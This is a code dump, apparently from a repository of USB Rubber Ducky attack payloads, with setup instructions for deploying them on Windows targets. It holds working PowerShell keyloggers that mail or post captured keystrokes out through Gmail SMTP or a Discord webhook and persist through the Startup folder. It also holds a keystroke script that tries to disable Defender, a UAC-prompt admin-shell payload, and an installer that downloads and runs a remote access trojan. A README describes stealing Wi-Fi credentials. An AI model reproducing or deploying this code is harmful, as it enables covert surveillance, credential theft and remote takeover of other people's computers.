Set-Up/Installation 47 | 1. change Gmail credentials in *p.ps1* 48 | ```powershell 49 | # gmail credentials 50 | $email = "example@gmail.com" 51 | $password = "password" 52 | ``` 53 | 2. in line 20 of *payload.txt*, change 'L' to the name of your ducky [SD Card] 54 | ```powershell 55 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 56 | ``` 57 | 3. flash Twin-Duck firmware on to your duck 58 | - [Tutorial](https://www.youtube.com/watch?v=BzYH-BPHLpE) 59 | 4. load, encode, and deploy!! 60 | 61 | ## Extraneous: 62 | The *c.cmd* attack opportunity 63 | ``` 64 | the c.cmd file runs every startup. 65 | this means an attacker could place a 66 | 'wget' or 'Invoke-WebRequest' and have a file 67 | be downloaded from anywhere on the internet onto the computer. 68 | the file would then save in the startup directory, 69 | allowing it to run every startup 70 | ``` 71 | --- 72 | - hope you enjoy the payload!! 73 | - please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :) 74 | -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 3 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/l.ps1" -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | 4 | # times logs will be sent [keep in military time] 5 | $logTimes = @( 6 | '00:00:00', 7 | '01:00:00', 8 | '02:00:00', 9 | '03:00:00', 10 | '04:00:00', 11 | '05:00:00', 12 | '06:00:00', 13 | '07:00:00', 14 | '08:00:00', 15 | '09:00:00', 16 | '10:00:00', 17 | '11:00:00', 18 | '12:00:00', 19 | '13:00:00', 20 | '14:00:00', 21 | '15:00:00', 22 | '16:00:00', 23 | '17:00:00', 24 | '18:00:00', 25 | '19:00:00', 26 | '20:00:00', 27 | '21:00:00', 28 | '22:00:00', 29 | '23:00:00' 30 | ) 31 | 32 | # sort the times in chronological order 33 | $logTimes = $logTimes | Sort-Object 34 | 35 | # ensure keylogger runs every day 36 | while ($true) { 37 | 38 | # run keylogger for each trigger time 39 | foreach ($t in $logTimes) 40 | { 41 | # checks if time passed already 42 | if((Get-Date) -lt (Get-Date -Date $t)) 43 | { 44 | # sleeps until next time is reached 45 | while ((Get-Date -Date $t) -gt (Get-Date)) 46 | { 47 | # sleeps 48 | (Get-Date -Date $t) - (Get-Date) | Start-Sleep 49 | } 50 | 51 | # runs keylogger 52 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # keylogger 9 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 10 | 11 | # email process 12 | $logs = Get-Content "$logFile" 13 | $subject = "$env:UserName logs" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $logs); 18 | 19 | # generate log file 20 | $generateLog = New-Item -Path $logFile -ItemType File -Force 21 | 22 | # API signatures 23 | $APIsignatures = @' 24 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 25 | public static extern short GetAsyncKeyState(int virtualKeyCode); 26 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 27 | public static extern int GetKeyboardState(byte[] keystate); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int MapVirtualKey(uint uCode, int uMapType); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 32 | '@ 33 | 34 | # set up API 35 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 36 | 37 | # attempt to log keystrokes 38 | try { 39 | while ($true) { 40 | Start-Sleep -Milliseconds 40 41 | 42 | for ($ascii = 9; $ascii -le 254; $ascii++) { 43 | 44 | # use API to get key state 45 | $keystate = $API::GetAsyncKeyState($ascii) 46 | 47 | # use API to detect keystroke 48 | if ($keystate -eq -32767) { 49 | $null = [console]::CapsLock 50 | 51 | # map virtual key 52 | $mapKey = $API::MapVirtualKey($ascii, 3) 53 | 54 | # create a stringbuilder 55 | $keyboardState = New-Object Byte[] 256 56 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 57 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 58 | 59 | # translate virtual key 60 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 61 | # add logged key to file 62 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 63 | } 64 | } 65 | } 66 | } 67 | } 68 | 69 | # send logs if code fails 70 | finally { 71 | # send email 72 | $smtp.Send($email, $email, $subject, $logs); 73 | } 74 | } 75 | 76 | # run keylogger 77 | KeyLogger -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/payload.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 | 13 | REM STAGE2 14 | REM attempts to disable defender 15 | STRING Set-MpPreference -DisableRealtimeMonitoring $true; 16 | 17 | REM STAGE 3 18 | REM move files to appropiate directories 19 | REM change 'L' to the name of your ducky 20 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 21 | ENTER 22 | DELAY 200 23 | 24 | REM comment out the option you decide NOT to use 25 | 26 | REM STAGE 4 27 | REM run keylogger 28 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 29 | 30 | REM STAGE 5 31 | REM deploy 32 | ENTER 33 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\p.ps1" 3 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\l.ps1" 4 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | 4 | for(;;) { 5 | try { 6 | # invoke the worker script 7 | $proc = Get-Content "$env:temp/DdBPKCytRe" 8 | Stop-process -id $proc -Force 9 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 10 | } 11 | catch { 12 | # do something with $_, log it, more likely 13 | } 14 | 15 | # wait for a minute 16 | Start-Sleep 60 17 | } 18 | 19 | # sort the times in chronological order 20 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # webhook, CHANGE ME 5 | $webhook = "DISCORDWEBHOOK" 6 | 7 | # write pid 8 | $PID > "$env:temp/DdBPKCytRe" 9 | 10 | # keylogger 11 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 12 | 13 | # webhook process 14 | $logs = Get-Content "$logFile" | Out-String 15 | $Body = @{ 16 | 'username' = $env:UserName 17 | 'content' = $logs 18 | } 19 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 20 | 21 | # generate log file 22 | $generateLog = New-Item -Path $logFile -ItemType File -Force 23 | 24 | # API signatures 25 | $APIsignatures = @' 26 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 27 | public static extern short GetAsyncKeyState(int virtualKeyCode); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int GetKeyboardState(byte[] keystate); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int MapVirtualKey(uint uCode, int uMapType); 32 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 33 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 34 | '@ 35 | 36 | # set up API 37 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 38 | 39 | # attempt to log keystrokes 40 | try { 41 | while ($true) { 42 | Start-Sleep -Milliseconds 40 43 | 44 | for ($ascii = 9; $ascii -le 254; $ascii++) { 45 | 46 | # use API to get key state 47 | $keystate = $API::GetAsyncKeyState($ascii) 48 | 49 | # use API to detect keystroke 50 | if ($keystate -eq -32767) { 51 | $null = [console]::CapsLock 52 | 53 | # map virtual key 54 | $mapKey = $API::MapVirtualKey($ascii, 3) 55 | 56 | # create a stringbuilder 57 | $keyboardState = New-Object Byte[] 256 58 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 59 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 60 | 61 | # translate virtual key 62 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 63 | # add logged key to file 64 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 65 | } 66 | } 67 | } 68 | } 69 | } 70 | 71 | # send logs if code fails 72 | finally { 73 | # send logs via webhook 74 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 75 | } 76 | } 77 | 78 | # run keylogger 79 | KeyLogger -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/payload.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 | 13 | REM STAGE 3 14 | REM move files to appropiate directories 15 | REM change 'L' to the name of your ducky 16 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 17 | ENTER 18 | DELAY 200 19 | 20 | REM STAGE 4 21 | REM run keylogger 22 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 23 | 24 | REM STAGE 5 25 | REM deploy 26 | ENTER 27 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/uninstaller.cmd: -------------------------------------------------------------------------------- 1 | cd C:/Users/%USERNAME%/AppData/Roaming/Microsoft/Windows && cd "Start Menu" && cd Programs/Startup 2 | del c.cmd 3 | cd %TEMP% 4 | del l.ps1 5 | del p.ps1 6 | del DdBPKCytRe 7 | del %USERNAME%.log 8 | taskkill /im powershell.exe /f 9 | -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/README.md: -------------------------------------------------------------------------------- 1 | # DuckMinistrator 2 | > Blue Cosmo 3 | 4 | ## Requirements 5 | - rubber ducky flashed with twinduck 6 | - micro sd card labled "D" 7 | - Windows 10 target 8 | 9 | ## Overview 10 | ``` 11 | gets an administrative powershell using a 'c.cmd' script 12 | ``` 13 | 14 | ## Install 15 | ```bash 16 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/DuckMinistrator 17 | ``` 18 | 19 | ## Setup 20 | 1. Name micro sd card "D" 21 | 2. Flash twinduck on to ducky 22 | 3. add whatever you want to run in the powershell to the bottom of 'payload.txt' 23 | 4. load, encode, and deploy! 24 | -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/c.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | REM you can remove the 'powershell' to get an admin CMD 32 | start powershell 33 | -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/rubberducky/DuckMinistrator/inject.bin -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/payload.txt: -------------------------------------------------------------------------------- 1 | REM Get Admin CMD/Powershell 2 | REM Created By : C0SM0 3 | 4 | REM open powershell 5 | DELAY 1000 6 | GUI r 7 | DELAY 200 8 | STRING powershell /c $u=gwmi Win32_Volume|?{$_.Label -eq'D'}|select name;cd $u.name;./c.cmd 9 | ENTER 10 | DELAY 2000 11 | 12 | REM accept administrative permissions 13 | ALT y 14 | DELAY 1000 15 | 16 | REM run whatever you want to run on an administrative powershell 17 | -------------------------------------------------------------------------------- /rubberducky/OnlyDuck/README.md: -------------------------------------------------------------------------------- 1 | ## onlyduck.txt 2 | This is an installer for OnlyRAT that uses the [USB Rubber Ducky](https://shop.hak5.org/products/usb-rubber-ducky-deluxe). 3 | 4 | ## Download: 5 | ```bash 6 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/OnlyDuck 7 | ``` 8 | 9 | ## Instructions: 10 | 1. In line 18, replace `DISCORDWEBHOOK` with your discord webhook 11 | ``` 12 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 13 | ``` 14 | 2. Load, Encode, and Deploy 15 | -------------------------------------------------------------------------------- /rubberducky/OnlyDuck/onlyduck.txt: -------------------------------------------------------------------------------- 1 | REM OnlyRAT installer via the USB Rubber Ducky 2 | REM Created by : C0SM0 3 | 4 | REM open the command linve via the runbox 5 | DELAY 1000 6 | GUI r 7 | DELAY 400 8 | STRING cmd 9 | ENTER 10 | 11 | REM execute discord webhook installer 12 | DELAY 800 13 | STRING set "YKHfpmMRoQ=C:/Users/%username%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup" 14 | ENTER 15 | STRING cd %YKHfpmMRoQ% 16 | ENTER 17 | REM replace "DISCORDWEBHOOK" with your Discord Webhook 18 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 19 | ENTER 20 | STRING powershell powershell.exe -windowstyle hidden "Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/dw1.cmd -OutFile wEaoFkNduy.cmd" 21 | ENTER 22 | DELAY 200 23 | STRING powershell ./wEaoFkNduy.cmd && exit 24 | ENTER 25 | 26 | REM UAC bypass 27 | DELAY 1800 28 | ALT y -------------------------------------------------------------------------------- /rubberducky/duckfi/README.md: -------------------------------------------------------------------------------- 1 | create wifi hotspots with usb rubber ducky 2 | 3 | ## Download: 4 | ```bash 5 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/duckfi 6 | ``` 7 | -------------------------------------------------------------------------------- /rubberducky/duckfi/c.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | REM you can remove the 'powershell' to get an admin CMD 32 | sc config Wlansvc start= demand 33 | sc start Wlansvc 34 | netsh wlan set hostednetwork mode=allow ssid=cosmo key=subscribe keyUsage=persistent && netsh wlan start cosmo;exit -------------------------------------------------------------------------------- /rubberducky/duckfi/payload.txt: -------------------------------------------------------------------------------- 1 | REM DuckFi, activate Windows Wifi Hotspots for 'Free Wifi' 2 | REM Created by : C0SM0 3 | 4 | REM Stage 1, get administrative powershell 5 | DELAY 1000 6 | GUI r 7 | DELAY 200 8 | STRING powershell /c $u=gwmi Win32_Volume|?{$_.Label -eq'D'}|select name;cd $u.name;./c.cmd 9 | ENTER 10 | 11 | REM Stage2, accept administrative permissions 12 | DELAY 2000 13 | ALT y 14 | DELAY 1500 15 | 16 | --- 17 | 18 | REM Stage 3, create hotspot 19 | STRING netsh wlan set hostednetwork mode=allow ssid=cosmo key=subscribe keyUsage=persistent;netsh wlan start cosmo;exit 20 | ENTER 21 | 22 | “Create Wifi Hotspot” 23 | 24 | type: netsh wlan set hostednetwork mode=allow ssid=hotspotname key=hotspotpassword 25 | 26 | *password has minimum of 8 characters 27 | 28 | *hotspotname can be changed to ideal name 29 | 30 | *hotspotpassword can be changed to ideal password 31 | 32 | to start/activate: 33 | 34 | type: netsh wlan start hotspotname 35 | 36 | *hotspotname needs to be the same as before 37 | 38 | to stop/deactivate: 39 | 40 | type: netsh wlan stop hotspotname 41 | 42 | *hotspotname needs to be the same as before -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/README.md: -------------------------------------------------------------------------------- 1 | # Ducky-Flasher 2 | > Easily flash your USB Rubber ducky from Hak5! 3 | 4 | - [video](https://www.youtube.com/watch?v=BzYH-BPHLpE) 5 | 6 | # Firmwares included: 7 | 1. duck.hex v2 (Duck(Original)) 8 | 2. usb.hex v2 (FAT Duck) 9 | 3. m_duck.hex v2 (Detour Duck(formerly Naked Duck)) 10 | 4. c_duck.hex v2 (Twin Duck) 11 | 5. Twin Duck Versions (Original, Special 1, Special 2) 12 | 13 | # To read more about the firmware go here 14 | - https://code.google.com/p/ducky-decode/wiki/Which_Firmware 15 | 16 | # To install ducky-flasher run sudo python setup.py 17 | You must have dfu-programmer installed (sudo apt-get install dfu-programmer) 18 | 19 | # To start ducky-flasher type ducky-flasher in your terminal emulator 20 | 21 | # Uninstalling 22 | To uninstall ducky-flasher run sudo python uninstall.py 23 | -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/readme.txt: -------------------------------------------------------------------------------- 1 | Ducky-Flasher 2 | Easily flash your USB Rubber ducky from Hak5! 3 | 4 | #Firmwares included: 5 | 1. duck.hex v2 (Duck(Original)) 6 | 2. usb.hex v2 (FAT Duck) 7 | 3. m_duck.hex v2 (Detour Duck(formerly Naked Duck)) 8 | 4. c_duck.hex v2 (Twin Duck) 9 | 5. Twin Duck Versions (Original, Special 1, Special 2) 10 | #To read more about the firmware go here 11 | https://code.google.com/p/ducky-decode/wiki/Which_Firmware 12 | 13 | #To install ducky-flasher run sudo python setup.py 14 | You must have dfu-programmer installed (sudo apt-get install dfu-programmer) 15 | 16 | #To start ducky-flasher type ducky-flasher in your terminal emulator 17 | 18 | #Uninstalling 19 | 20 | To uninstall ducky-flasher run sudo python uninstall.py 21 | -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/setup.py: -------------------------------------------------------------------------------- 1 | #Make ducky-flasher a default command 2 | 3 | import os 4 | 5 | permission = os.system("sudo chmod 777 ducky-flasher") 6 | 7 | if permission == 0: 8 | move = os.system("sudo cp ducky-flasher /usr/bin; sudo cp -r Firmware /usr/bin") 9 | if move == 0: 10 | print "ducky-flasher is setup!" 11 | print "To use it, type sudo ducky-flasher" 12 | else: 13 | print "Make sure you ran setup.py with sudo" 14 | 15 | else: 16 | print "Make sure you ran setup.py with sudo" 17 | -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/uninstall.py: -------------------------------------------------------------------------------- 1 | #Uninstall ducky-flasher 2 | import os 3 | os.system("clear") 4 | print "Are you sure you want to uninstall ducky-flahser?" 5 | print "1 = yes" 6 | print "2 = no" 7 | question = int(raw_input("Choice: ")) 8 | 9 | if question == 1: 10 | os.system("clear") 11 | print "Uninstalling..." 12 | status = os.system("sudo rm /usr/bin/ducky-flasher; rm -r /usr/bin/Firmware") 13 | if status == 0: 14 | os.system("clear") 15 | print "ducky-flasher has been uninstalled :(" 16 | else: 17 | print "make sure your running as root" 18 | else: 19 | os.system("clear") 20 | print "OK, Awesome :P" 21 | -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/README.md: -------------------------------------------------------------------------------- 1 | # DuckyLan SMTP 2 | > Blue Cosmo 3 | 4 | --- 5 | 6 | ``` 7 | ________ __ .____ 8 | \______ \ __ __ ____ | | _____.__.| | _____ ____ 9 | | | \| | \_/ ___\| |/ < | || | \__ \ / \ 10 | | ` \ | /\ \___| < \___ || |___ / __ \| | \ 11 | /_______ /____/ \___ >__|_ \/ ____||_______ (____ /___| / 12 | \/ \/ \/\/ \/ \/ \/ 13 | ``` 14 | 15 | ## Overview: 16 | A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP. 17 | 18 | ## Resources: 19 | - [YouTube Video]() 20 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 21 | - [Website](https://cosmodiumcs.com) 22 | 23 | ## Requirements: 24 | - [Twin-Duck firmware](https://www.youtube.com/watch?v=BzYH-BPHLpE) 25 | - Gmail account 26 | - i suggest making a separate Gmail account for this payload 27 | - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 28 | - Windows 10 Target 29 | 30 | ## Download: 31 | ```bash 32 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/duckylan-smtp 33 | ``` 34 | 35 | ## Instructions: 36 | Set-Up/Installation 37 | 1. change Gmail credentials in *p.ps1* 38 | ```powershell 39 | # gmail credentials 40 | $email = "example@gmail.com" 41 | $password = "password" 42 | ``` 43 | 2. in line 15 of *payload.txt*, change 'W' to the name of your ducky [SD 